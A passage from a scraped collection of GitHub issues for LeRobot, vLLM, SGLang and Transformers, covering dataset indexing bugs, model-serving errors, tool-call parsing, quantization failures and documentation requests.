\"/path/to/lerobot/datasets/lerobot_dataset.py\", line 1028, in __getitem__\n item = self.hf_dataset[idx]\n ...\nIndexError: Invalid key: 180 is out of bounds for size 180\n```\n\n## Steps to Reproduce\n\n1. Create a LeRobot dataset with multiple episodes (e.g., 20 episodes, 180 frames each)\n2. Try to visualize episode 1:\n ```bash\n lerobot-dataset-viz \\\n --repo-id lerobot/test \\\n --root ./lerobot_dataset \\\n --mode local \\\n --episode-index 1 \\\n --batch-size 2\n ```\n3. Error occurs when trying to load the data\n\n## Root Cause Analysis\n\nThe bug is in the `EpisodeSampler` class (line 81-91 of `lerobot_dataset_viz.py`):\n\n```python\nclass EpisodeSampler(torch.utils.data.Sampler):\n def __init__(self, dataset: LeRobotDataset, episode_index: int):\n from_idx = dataset.meta.episodes[\"dataset_from_index\"][episode_index] # 180\n to_idx = dataset.meta.episodes[\"dataset_to_index\"][episode_index] # 360\n self.frame_ids = range(from_idx, to_idx) # range(180, 360)\n```\n\n**The problem:**\n1. At line 287, the dataset is filtered: `dataset = LeRobotDataset(repo_id, episodes=[args.episode_index], ...)`\n2. The filtered dataset only contains 180 frames with **local indices 0-179**\n3. But `EpisodeSampler` uses indices from `dataset.meta.episodes` which are **global indices 180-359** (position in the full dataset)\n4. When DataLoader tries to access `dataset[180]`, it fails because the filtered dataset only has indices 0-179\n\n**Example:**\n```\nFull dataset (3600 frames):\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Episode 0\u2502 Episode 1\u2502 Episode 2\u2502 ... \u2502 Episode 19\u2502\n\u2502 0-179 \u2502 180-359 \u2502 360-539 \u2502 ... \u2502 3420-3599\u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n \u2191\n Global indices\n\nFiltered dataset (180 frames, episode 1 only):\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Episode 1\u2502 \u2190 Only these 180 frames exist\n\u2502 0-179 \u2502 \u2190 Local indices in filtered dataset\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\nEpisodeSampler tries to use: range(180, 360) \u2717 Out of bounds!\n```\n\n## Proposed Fix\n\nModify `EpisodeSampler` to handle filtered datasets:\n\n```python\nclass EpisodeSampler(torch.utils.data.Sampler):\n def __init__(self, dataset: LeRobotDataset, episode_index: int):\n # Check if dataset is already filtered to a single episode\n if dataset.episodes is not None and len(dataset.episodes) == 1:\n # Dataset is filtered, use all available frames (local indices)\n self.frame_ids = range(len(dataset))\n else:\n # Dataset is not filtered, use global indices from metadata\n from_idx = dataset.meta.episodes[\"dataset_from_index\"][episode_index]\n to_idx = dataset.meta.episodes[\"dataset_to_index\"][episode_index]\n self.frame_ids = range(from_idx, to_idx)\n\n def __iter__(self) -> Iterator:\n return iter(self.frame_ids)\n\n def __len__(self) -> int:\n return len(self.frame_ids)\n```\n\n## Workaround\n\nUntil this is fixed, users can visualize a specific episode by:\n\n1. Loading the full dataset without filtering\n2. Using `torch.utils.data.Subset` to select the episode\n\n```python\nimport rerun as rr\nfrom lerobot.datasets.lerobot_dataset import LeRobotDataset\nfrom torch.utils.data import DataLoader, Subset\n\n# Load full dataset (no filtering)\ndataset = LeRobotDataset(\n repo_id=\"lerobot/test\",\n root=\"./lerobot_dataset\"\n)\n\n# Manually select episode frames\nepisode_index = 1\nfrom_idx = dataset.meta.episodes[episode_index][\"dataset_from_index\"]\nto_idx = dataset.meta.episodes[episode_index][\"dataset_to_index\"]\nepisode_dataset = Subset(dataset, range(from_idx, to_idx))\n\n# Create dataloader\ndataloader = DataLoader(episode_dataset, batch_size=2, shuffle=False)\n\n# Visualize...\n```\n\n## Environment\n\n- **LeRobot Version:** 0.4.2\n- **Python Version:** 3.12.11\n- **PyTorch Version:** 2.7.1+cu126\n- **Datasets Version:** 4.1.1\n- **OS:** Linux\n\n## Additional Context\n\nThis issue affects any dataset where users want to visualize a specific episode that is not episode 0. The bug makes the `--episode-index` parameter effectively unusable for episodes other than the first one when the dataset has already been filtered.\n\n## Impact\n\n- **Severity:** Medium (cor", "url": "https://github.com/huggingface/lerobot/issues/2678", "state": "open", "labels": [ "bug", "question", "dataset", "visualization", "python", "examples" ], "created_at": "2025-12-18T08:45:05Z", "updated_at": "2025-12-24T08:31:00Z", "user": "apeSh1t" }, { "repo": "vllm-project/vllm", "number": 30941, "title": "[Performance]: Why Does Latency Remain Unchanged in vLLM 0.11.0 When Input Token Count Decreases for qwen3-vl-30b-a3b?", "body": "### Proposal to improve performance\n\n_No response_\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\nUsing vLLM version 0.11.0 to run the qwen3-vl-30b-a3b model, the stress test results show that although the number of input tokens decreases, the latency does not change.\n\nThe model is deployed on a single A800 GPU. The startup command is:\nvllm server\n--dtype bfloat16\n--max-model-len 128000\n--gpu-memory-utilization 0.95\n--limit-mm-per-prompt.video 0\n\nI performed a stress test using one image and a set of text prompts, with QPS set to 10.\nI resized the image to 0.25x and 0.7x of the original size while keeping everything else unchanged.\n\nThe conclusions are as follows:\nqwen3-30b-a3b (single image *0.25) latency 3s\nqwen3-30b-a3b (single image *0.7) latency 5s\nqwen3-30b-a3b (single image) latency 5s\n\nPrior conditions:\nInput token scale / Output token scale\nSingle image + text prompts: about 4200 / about 70\nSingle image *0.6 + text prompts: about 1900 / about 70\nSingle image *0.3 + text prompts: about 860 / about 70\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30941", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-18T07:40:35Z", "updated_at": "2025-12-18T07:40:35Z", "comments": 0, "user": "Hormoney" }, { "repo": "vllm-project/vllm", "number": 30933, "title": "[Usage]: What is the latest instruction to run DeepSeek V3.2?", "body": "### Your current environment\n\nvLLM 0.12.0\n\n### How would you like to use vllm\n\nI am following the guidelines here https://docs.vllm.ai/projects/recipes/en/latest/DeepSeek/DeepSeek-V3_2.html for running DeepSeek v3.2. By following the instructions I installed vLLM 0.12.0 on my H200 node. However, when I try to run it with `vllm serve deepseek-ai/DeepSeek-V3.2 --tensor-parallel-size 8 --tokenizer-mode deepseek_v32` it gives an error \n\n```\n(APIServer pid=816209) ValueError: No tokenizer registered for tokenizer_mode='deepseek_v32'. \n```\n\nIf I do not include the `--tokenizer-mode` then the server spins up with no errors, but when I try to send a request, I get another error below\n\n```\n(APIServer pid=753941) ERROR 12-18 06:04:47 [serving_chat.py:263] ValueError: As of transformers v4.44, default chat template is no longer allowed, so you must provide a chat template if the tokenizer does not define one. \n```\n\nI am wondering if there is an update on the instructions to run DeepSeek V3.2 on vLLM.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30933", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-18T06:18:29Z", "updated_at": "2025-12-18T15:50:29Z", "comments": 1, "user": "IKACE" }, { "repo": "vllm-project/vllm", "number": 30923, "title": "[Bug]: Use the offical doucment vllm online method deploy DeepSeek-OCR\uff0cthe result is very bad . but I ust the offline method the result is normal. why ?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nI use https://github.com/vllm-project/recipes/blob/main/DeepSeek/DeepSeek-OCR.md\nthe offline and online mehtod is work, run ok\u3002\nbut the same picture in offline is better than online, I can't find the reason what happend ? can someone help me \n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30923", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-18T04:14:33Z", "updated_at": "2025-12-18T04:25:20Z", "comments": 0, "user": "git-liweichao" }, { "repo": "vllm-project/vllm", "number": 30922, "title": "[Bug]: Use the offical doucment vllm online method deploy DeepSeek-OCR\uff0cthe result is very bad . but I ust the offline method the result is normal. why ?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nI use https://github.com/vllm-project/recipes/blob/main/DeepSeek/DeepSeek-OCR.md\nthe offline and online mehtod is work, run ok\u3002\nbut the same picture in offline is better than online, I can't find the reason what happend ? can someone help me \n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30922", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-18T04:08:46Z", "updated_at": "2025-12-18T04:25:36Z", "comments": 1, "user": "git-liweichao" }, { "repo": "sgl-project/sglang", "number": 15359, "title": "[Bug] The handling logic for tool_choice = 'auto' in the DeepseekV3.2 model may be incorrect.", "body": "### Checklist\n\n- [ ] I searched related issues but found no solution.\n- [ ] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [ ] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nWhen using SGLang (sglang:v0.5.6.post2) with DeepseekV3.2, I noticed the response of some request which involves tool calls is not currect.\nlike the following requests\n```sh\ncurl -X POST http://{host}:{port}/v1/chat/completions \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer sk-1234\" \\\n -d '{\n \"model\": \"DeepseekV3.2\",\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the weather in Beijing?\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_current_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"strict\": true,\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state, e.g. San Francisco, CA\"\n },\n \"unit\": {\n \"type\": \"string\",\n \"enum\": [\"celsius\", \"fahrenheit\"]\n }\n },\n \"required\": [\"location\"]\n }\n }\n }\n ],\n \"tool_choice\": \"auto\",\n \"stream\": false\n }'\n``` \nmight response something like \n```sh\n{\"id\":\"88c2a168ad43446f9116aeed715cd835\",\"object\":\"chat.completion\",\"created\":1766024807,\"model\":\"DeepseekV3.2\",\"choices\":[{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":\"tool_call_name=current_weather\",\"reasoning_content\":null,\"tool_calls\":null},\"logprobs\":null,\"finish_reason\":\"stop\",\"matched_stop\":1}],\"usage\":{\"prompt_tokens\":198,\"total_tokens\":206,\"completion_tokens\":8,\"prompt_tokens_details\":null,\"reasoning_tokens\":0},\"metadata\":{\"weight_version\":\"default\"}}\n```\nor\n```sh\n{\"id\":\"0223b02af05b4c9b99e8b9e4b2abab12\",\"object\":\"chat.completion\",\"created\":1766026261,\"model\":\"DeepseekV3.2\",\"choices\":[{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":\"tool_call_name: get_current_weather\\ntool_call_arguments: {\\n \\\"location\\\": \\\"Beijing, China\\\",\\n \\\"unit\\\": \\\"celsius\\\"\\n}\",\"reasoning_content\":null,\"tool_calls\":null},\"logprobs\":null,\"finish_reason\":\"stop\",\"matched_stop\":1}],\"usage\":{\"prompt_tokens\":198,\"total_tokens\":232,\"completion_tokens\":34,\"prompt_tokens_details\":null,\"reasoning_tokens\":0},\"metadata\":{\"weight_version\":\"default\"}}\n```\nAs you can see from the response, the content value contains `tool_call_name` but tool_calls is set to `null`\n\nAnd if change tool_choice to 'required', the response looks like \n```sh\n{\"id\":\"550109a7f6854af3ba47fdad4f38f9d5\",\"object\":\"chat.completion\",\"created\":1766025639,\"model\":\"DeepseekV3.2\",\"choices\":[{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":null,\"reasoning_content\":null,\"tool_calls\":[{\"id\":\"call_f171fbf82d7d41dab0eaf258\",\"index\":0,\"type\":\"function\",\"function\":{\"name\":\"get_current_weather\",\"arguments\":\"{\\\"location\\\": \\\"Beijing, China\\\", \\\"unit\\\": \\\"celsius\\\"}\"}}]},\"logprobs\":null,\"finish_reason\":\"tool_calls\",\"matched_stop\":null}],\"usage\":{\"prompt_tokens\":198,\"total_tokens\":229,\"completion_tokens\":31,\"prompt_tokens_details\":null,\"reasoning_tokens\":0},\"metadata\":{\"weight_version\":\"default\"}}\n```\n\nand when checking the source codes, I find it might be related to the following codes\nhttps://github.com/sgl-project/sglang/blob/9e7656be80578fe981a723bd115373371a9d0d90/python/sglang/srt/entrypoints/openai/serving_chat.py#L248-L260\n\nhttps://github.com/sgl-project/sglang/blob/9e7656be80578fe981a723bd115373371a9d0d90/python/sglang/srt/function_call/function_call_parser.py#L189-L201\n\n\n### Reproduction\n\nstart SGLang with the following command\n```sh\npython3 -m sglang.launch_server --model /root/.cache/huggingface/DeepSeek-V3.2 --served-model-name VILLM-N2 --tp 8 --ep 8 --dp 8 --enable-dp-attention --trust-remote-code --port 30000 --host 0.0.0.0 --enable-metrics --mem-fraction-static 0.75 --cuda-graph-max-bs 128 --torch-compile-max-bs 8 --speculative-algorithm EAGLE --speculative-num-steps 3 --speculative-eagle-topk 1 --speculative-num-draft-tokens 4 --nsa-prefill-backend flashmla_sparse --nsa-decode-backend fa3 --grammar-backend xgrammar --reasoning-parser deepseek-v3 --tool-call-parser deepseekv32 --chat-template ./examples/chat_template/tool_chat_template_deepseekv32.jinja\n```\n\nsend request\n```sh\ncurl -X POST http://{host}:{port}/v1/chat/completions \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer sk-1234\" \\\n -d '{\n \"model\": \"DeepseekV3.2\",\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the weather in Beijing?\"\n }\n ],\n \"tools\": [\n ", "url": "https://github.com/sgl-project/sglang/issues/15359", "state": "closed", "labels": [], "created_at": "2025-12-18T02:47:26Z", "updated_at": "2025-12-18T03:36:38Z", "comments": 4, "user": "JerryKwan" }, { "repo": "huggingface/lerobot", "number": 2673, "title": "Dataset v2 not working anymore", "body": "### Ticket Type\n\nFeature\n\n### Environment & System Info\n\n```Shell\n- LeRobot version: 0.4.3\n- Platform: macOS-26.2-arm64-arm-64bit\n- Python version: 3.10.19\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- FFmpeg version: 7.1.1\n- PyTorch version: 2.7.1\n- Is PyTorch built with CUDA support?: False\n- Cuda version: N/A\n- GPU model: N/A\n- Using GPU in script?: \n- lerobot scripts: ['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n```\n\n### Description\n\nI did git pull and my dataset v2 doesn't work anymore. My model raises with the logs below.\n\n### Context & Reproduction\n\n1. `lerobot-train --help`\n2. Check outputs\n\n### Relevant logs or stack trace\n\n```Shell\nFile \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 733, in __next__\n data = self._next_data()\nFile \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 1488, in _next_data\n return self._process_data(data, worker_id)\nFile \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 1550, in _process_data\n data.reraise()\nFile \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/_utils.py\", line 750, in reraise\n raise exception\nIndexError: Caught IndexError in DataLoader worker process 1.\nOriginal Traceback (most recent call last):\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/_utils/worker.py\", line 349, in _worker_loop\n data = fetcher.fetch(index) # type: ignore[possibly-undefined]\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in fetch\n data = [self.dataset[idx] for idx in possibly_batched_index]\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in \n data = [self.dataset[idx] for idx in possibly_batched_index]\n File \"/admin/home/michel_aratingi/code/collab-lerobot/src/lerobot/datasets/lerobot_dataset.py\", line 975, in __getitem__\n item = self.hf_dataset[idx]\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2859, in __getitem__\n return self._getitem(key)\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2840, in _getitem\n pa_subtable = query_table(self._data, key, indices=self._indices)\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/datasets/formatting/formatting.py\", line 612, in query_table\n _check_valid_index_key(key, size)\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/datasets/formatting/formatting.py\", line 552, in _check_valid_index_key\n raise IndexError(f\"Invalid key: {key} is out of bounds for size {size}\")\nIndexError: Invalid key: 46969 is out of bounds for size 46963\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] (I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\nMaybe if I try to update my transformers dependency?\n\nI edit this ticket", "url": "https://github.com/huggingface/lerobot/issues/2673", "state": "closed", "labels": [ "enhancement", "question", "dataset", "dependencies", "training" ], "created_at": "2025-12-17T21:35:31Z", "updated_at": "2025-12-17T23:26:54Z", "user": "imstevenpmwork" }, { "repo": "huggingface/lerobot", "number": 2670, "title": "Async inference for simulation (libero benchmark)", "body": "### Issue Type\n\n{\"label\" => \"\u2753 Technical Question\"}\n\n### Environment & System Info\n\n```Shell\n\n```\n\n### Description\n\nIs there any way that we can support async inference for simulator (e.g., libero)? This makes it possible to test RTC with simulators. \n\n### Context & Reproduction\n\nA question re a feature. \n\n### Expected Behavior / Desired Outcome\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing issues to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] (For bugs) I have verified this is not an environment-specific issue.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2670", "state": "open", "labels": [ "question", "simulation", "performance", "evaluation" ], "created_at": "2025-12-17T18:57:07Z", "updated_at": "2026-01-02T05:40:18Z", "user": "dywsjtu" }, { "repo": "huggingface/transformers", "number": 42930, "title": "Inconsistent handling of video_metadata in Qwen3VLVideoProcessor usage example", "body": "### System Info\n\ntransformers==4.57.3\n\n### Who can help?\n\n@zucchini-nlp @yonigozlan @molbap\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nI'm working with the `Qwen3VLVideoProcessor` and noticed a potential inconsistency between the processor's output and its expected usage.\n\nAccording to the current implementation of `Qwen3VLVideoProcessor._preprocess()`, the returned `BatchFeature` only contains the keys:\n- `\"pixel_values_videos\"`\n- `\"video_grid_thw\"`\n\nHowever, in some calling code, I see logic like:\n\n```python\nvideos_inputs = self.video_processor(videos=videos, **kwargs)\nif \"return_metadata\" not in kwargs:\n video_metadata = videos_inputs.pop(\"video_metadata\")\n```\n\nHow does it work? thank you very much\n\n### Expected behavior\n\nI want to change Qwen2.5vl to Qwen3vl but can't set a fixed nframes", "url": "https://github.com/huggingface/transformers/issues/42930", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-17T17:21:00Z", "updated_at": "2025-12-18T10:32:23Z", "comments": 3, "user": "wagoriginal" }, { "repo": "vllm-project/vllm", "number": 30882, "title": "[Bug]: Marlin Fp8 Block Quant Failure", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\n```bash\nMODEL := \"Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8\"\n#MODEL := \"RedHatAI/Mixtral-8x7B-Instruct-v0.1-FP8\"\n\nlaunch_marlin:\n\tVLLM_TEST_FORCE_FP8_MARLIN=1 VLLM_USE_DEEPGEMM=0 chg run --gpus 1 -- vllm serve {{MODEL}} --enforce-eager --max-model-len 8192\n\neval:\n\tlm_eval \\\n\t\t--model local-completions \\\n\t\t--tasks gsm8k \\\n\t\t--model_args \"model={{MODEL}},base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False\"\n```\n\nResult:\n\n```bash\n(vllm) [robertgshaw2-redhat@nm-automation-h100-standalone-1-preserve vllm]$ just launch_marlin\nVLLM_TEST_FORCE_FP8_MARLIN=1 VLLM_USE_DEEPGEMM=0 chg run --gpus 1 -- vllm serve Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8 --enforce-eager --max-model-len 8192\nReserved 1 GPU(s): [1] for command execution\n(APIServer pid=3634068) INFO 12-17 15:54:23 [api_server.py:1259] vLLM API server version 0.13.0rc2.dev185+g00a8d7628\n(APIServer pid=3634068) INFO 12-17 15:54:23 [utils.py:253] non-default args: {'model_tag': 'Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8', 'model': 'Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8', 'max_model_len': 8192, 'enforce_eager': True}\n(APIServer pid=3634068) INFO 12-17 15:54:23 [model.py:514] Resolved architecture: Qwen3MoeForCausalLM\n(APIServer pid=3634068) INFO 12-17 15:54:23 [model.py:1661] Using max model len 8192\n(APIServer pid=3634068) INFO 12-17 15:54:24 [scheduler.py:230] Chunked prefill is enabled with max_num_batched_tokens=8192.\n(APIServer pid=3634068) WARNING 12-17 15:54:24 [vllm.py:622] Enforce eager set, overriding optimization level to -O0\n(APIServer pid=3634068) INFO 12-17 15:54:24 [vllm.py:722] Cudagraph is disabled under eager mode\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:31 [core.py:93] Initializing a V1 LLM engine (v0.13.0rc2.dev185+g00a8d7628) with config: model='Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8', speculative_config=None, tokenizer='Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=8192, download_dir=None, load_format=auto, tensor_parallel_size=1, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=fp8, enforce_eager=True, kv_cache_dtype=auto, device_config=cuda, structured_outputs_config=StructuredOutputsConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_parser='', reasoning_parser_plugin='', enable_in_reasoning=False), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None, kv_cache_metrics=False, kv_cache_metrics_sample=0.01, cudagraph_metrics=False, enable_layerwise_nvtx_tracing=False), seed=0, served_model_name=Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8, enable_prefix_caching=True, enable_chunked_prefill=True, pooler_config=None, compilation_config={'level': None, 'mode': , 'debug_dump_path': None, 'cache_dir': '', 'compile_cache_save_format': 'binary', 'backend': 'inductor', 'custom_ops': ['+quant_fp8', 'all', '+quant_fp8'], 'splitting_ops': [], 'compile_mm_encoder': False, 'compile_sizes': [], 'compile_ranges_split_points': [8192], 'inductor_compile_config': {'enable_auto_functionalized_v2': False, 'combo_kernels': True, 'benchmark_combo_kernel': True}, 'inductor_passes': {}, 'cudagraph_mode': , 'cudagraph_num_of_warmups': 0, 'cudagraph_capture_sizes': [], 'cudagraph_copy_inputs': False, 'cudagraph_specialize_lora': True, 'use_inductor_graph_partition': False, 'pass_config': {'fuse_norm_quant': False, 'fuse_act_quant': False, 'fuse_attn_quant': False, 'eliminate_noops': False, 'enable_sp': False, 'fuse_gemm_comms': False, 'fuse_allreduce_rms': False}, 'max_cudagraph_capture_size': 0, 'dynamic_shapes_config': {'type': , 'evaluate_guards': False}, 'local_cache_dir': None}\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:32 [parallel_state.py:1210] world_size=1 rank=0 local_rank=0 distributed_init_method=tcp://10.243.64.5:43323 backend=nccl\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:32 [parallel_state.py:1418] rank 0 in world size 1 is assigned as DP rank 0, PP rank 0, PCP rank 0, TP rank 0, EP rank 0\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:33 [gpu_model_runner.py:3620] Starting to load model Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8...\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:33 [deep_gemm.py:76] DeepGEMM E8M0 enabled on current platform.\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:33 [cuda.py:351] Using FLASH_ATTN attention backend out of potential backends: ('FLASH_ATTN', 'FLASHINFER', 'TRITON_ATTN', 'FLEX_ATTENTION')\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:33 [layer.py:373] Enabled separate cuda str", "url": "https://github.com/vllm-project/vllm/issues/30882", "state": "closed", "labels": [ "bug", "help wanted", "good first issue" ], "created_at": "2025-12-17T15:55:18Z", "updated_at": "2025-12-17T16:02:54Z", "comments": 2, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 30879, "title": "[Doc]: Add some documentation about encoder compilation", "body": "### \ud83d\udcda The doc issue\n\nI want something like a design doc for encoder compilation. For example:\n- It uses support_torch_compile and set_model_tag to avoid cache collisions\n- it supports or doesn't support the following features that VllmBackend does: cudagraphs, compile_ranges, and a high-level explanation for how these are turned off or on.\n- it inherits from compilation_config (or maybe it doesn't)\n- here's how to turn it on/off\n\nI'm having a difficult time thinking through the edge cases in https://github.com/vllm-project/vllm/pull/30822 and https://github.com/vllm-project/vllm/pull/30489\n\ncc @Lucaskabela \n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30879", "state": "open", "labels": [ "documentation", "torch.compile" ], "created_at": "2025-12-17T15:44:50Z", "updated_at": "2025-12-17T16:27:38Z", "comments": 1, "user": "zou3519" }, { "repo": "vllm-project/vllm", "number": 30865, "title": "[Usage]:Tools GLM4.6v with vLLM", "body": "### Your current environment\n\nHello,\n\nI am running tests on this model, which I find excellent. However, I am encountering a few issues and would like to know whether it is possible to fix them or if I am simply asking for the impossible.\n\nFirst of all, here is my vLLM configuration:\n\n`docker run -d \\ --name vllm-llm \\ --gpus '\"device=4,5,6,7\"' \\ -e NVIDIA_DRIVER_CAPABILITIES=compute,utility \\ -e VLLM_OBJECT_STORAGE_SHM_BUFFER_NAME=\"${SHM_NAME}\" \\ -v /raid/workspace/qladane/vllm/hf-cache:/root/.cache/huggingface \\ --env \"HF_TOKEN=${HF_TOKEN:-}\" \\ -p 8003:8000 \\ --ipc=host \\ --restart unless-stopped \\ vllm-openai:glm46v \\ zai-org/GLM-4.6V-FP8 \\ --tensor-parallel-size 4 \\ --enforce-eager \\ --served-model-name ImagineAI \\ --allowed-local-media-path / \\ --limit-mm-per-prompt '{\"image\": 1, \"video\": 0}' \\ --max-model-len 131072 \\ --dtype auto \\ --kv-cache-dtype fp8 \\ --gpu-memory-utilization 0.85 \\ --reasoning-parser glm45 \\ --tool-call-parser glm45 \\ --enable-auto-tool-choice \\ --enable-expert-parallel \\ --mm-encoder-tp-mode data \\ --mm-processor-cache-type shm`\n\nNext, here is my OpenWebUI configuration:\n\n\"Image\"\n\n\"Image\"\n\n\"Image\"\n\n\"Image\"\n\nI would like to know whether, with GLM-4.6V and OpenWebUI, it is possible to make the model choose and execute tools autonomously when it considers them relevant.\n\nAt the moment:\n\nIf it is an internet search, I have to manually activate the button, even though access is already available.\n\nIf it is Python code, I have to click \u201cexecute\u201d; it does not run it by itself, even though it clearly has access to Jupyter, etc.\n\nIf anyone has already encountered this 